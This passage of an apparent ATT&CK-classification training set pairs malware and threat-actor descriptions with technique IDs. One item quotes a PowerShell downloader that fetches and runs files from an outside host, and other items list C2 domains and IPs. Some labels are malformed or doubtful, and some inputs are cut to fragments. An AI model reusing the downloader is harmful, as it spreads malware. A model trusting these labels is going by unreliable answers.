- "role": "user",
- "content": "Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. PowerShell downloader The downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. Beginning of the \"download and load\" shellcode The shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Sakula samples use cmd.exe to delete temporary files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke has used several C2 servers per targeted organization."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET will compress entire \"~/Desktop\" folders excluding all \".git\" folders, but only if the total data size is under 200MB."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is known to have the capability to overwrite the firmware on hard drives from some manufacturers."
- },
- {
- "role": "assistant",
- "content": "T1542.002 - Component Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has created shortcuts in the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about running processes on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can store harvested data in a custom database under the %TEMP% directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used Metasploit Bind and Reverse TCP stagers."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used revoked certificates to sign malware."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has the ability to identify the IP address of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT can delete files and directories."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cryptoistic can scan a directory to identify files for deletion."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary however the workflow of the malware stays the same and some features are copy/pasted from the previous Bisonal variant"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify the user name on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can perform keylogging by polling the \"GetAsyncKeyState()\" function."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The URL used can be found in the embedded OLE object:hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]Here is the source code of the downloaded HTA document:BonjourOnce decoded using the base64 algorithm, we are able to read the final payload:$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+\"\\\\alitmp0131.jpg\"$t2=$t+\"\\\\alitmp0132.jpg\"$t3=$t+\"\\\\alitmp0133.js\"try { echo $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\",$t1) $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\",$t2) $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\",$t3) wscript.exe $t3 }catch { }The purpose of this script is to download and execute a Windows script and two encoded payloads"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes files in Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download additional payloads onto the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession has the ability to execute inside the msiexec.exe process."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download and execute an additional file."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can use WMI to delete Shadow Volumes."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has used legitimate credentials to hijack email communications."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has used Ngrok to establish C2 and exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EKANS uses standard encryption library functions to encrypt files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious DLL is not a service DLL because it lacks ServiceMain()"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed."
- },
- {
- "role": "assistant",
- "content": "T1546.007 - Event Triggered Execution: Netsh Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa collected the system volume serial number, GUID, and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used compromised domain accounts to gain access to the target environment."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT obtains a list of running processes on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth — This web shell and credential stealer deployed to Microsoft Exchange servers is installed as an ISAPI filter"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp's bootkit can inject a malicious DLL into the address space of running processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malicious spearphishing payloads are executed as . has also used during and."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences, Windows vault credential objects, or using ."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine’s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the ‘++a++’ markers. The example C2s used by older variants of Comnie demonstrates this"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has performed screen captures of victims."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has added paths to executables in the Registry to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores', 'T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity: MD5 0beb957923df2c885d29a9c1743dd94b accounts.serveftp.com 59.188.0.197 BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several tools used by Suckfly have been command-line driven."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system."
- },
- {
- "role": "assistant",
- "content": "T1564.005 - Hidden File System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has the ability to identify Workgroup membership."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can execute shell commands. Orz can execute commands with JavaScript."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can download files from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK has the ability to use HTTP in communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses JavaScript to perform its core functionalities."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
